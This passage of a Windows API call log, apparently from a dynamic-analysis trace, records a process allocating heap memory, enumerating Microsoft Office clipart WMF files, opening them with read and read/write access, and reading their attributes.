hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0102.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0102.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0102.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0102.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0102.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0102.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0102.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0102.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0102.968] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.968] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.968] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.968] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0102.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.968] AreFileApisANSI () returned 1 [0102.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0102.969] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.969] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0102.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0102.969] AreFileApisANSI () returned 1 [0102.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ac50 [0102.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8ac50, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 69 [0102.969] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00923_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.969] GetFileType (hFile=0x33c) returned 0x1 [0102.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0102.969] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.970] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.970] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.970] CloseHandle (hObject=0x33c) returned 1 [0102.970] AreFileApisANSI () returned 1 [0102.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0102.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 69 [0102.970] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00923_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.970] GetFileType (hFile=0x33c) returned 0x1 [0102.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0102.970] CloseHandle (hObject=0x33c) returned 1 [0102.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0102.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0102.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0102.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0102.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0102.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0102.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.972] AreFileApisANSI () returned 1 [0102.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0102.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 69 [0102.972] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00923_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd65f8ed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd65f8ed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1870)) returned 1 [0102.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0102.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0102.972] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.972] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.972] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd65f8ed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd65f8ed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd685b3d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4c14, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00932_.WMF", cAlternateFileName="")) returned 1 [0102.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0102.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0102.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0102.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0102.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0102.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0102.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0102.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0102.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0102.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0102.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0102.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0102.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.973] AreFileApisANSI () returned 1 [0102.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0102.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0102.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0102.973] AreFileApisANSI () returned 1 [0102.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0102.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 69 [0102.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00932_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.974] GetFileType (hFile=0x33c) returned 0x1 [0102.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0102.974] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.974] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.974] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.974] CloseHandle (hObject=0x33c) returned 1 [0102.974] AreFileApisANSI () returned 1 [0102.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0102.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 69 [0102.975] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00932_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.975] GetFileType (hFile=0x33c) returned 0x1 [0102.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0102.975] CloseHandle (hObject=0x33c) returned 1 [0102.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0102.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0102.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0102.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0102.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0102.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0102.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.976] AreFileApisANSI () returned 1 [0102.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8afe0 [0102.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8afe0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 69 [0102.976] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00932_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd65f8ed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd65f8ed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd685b3d, 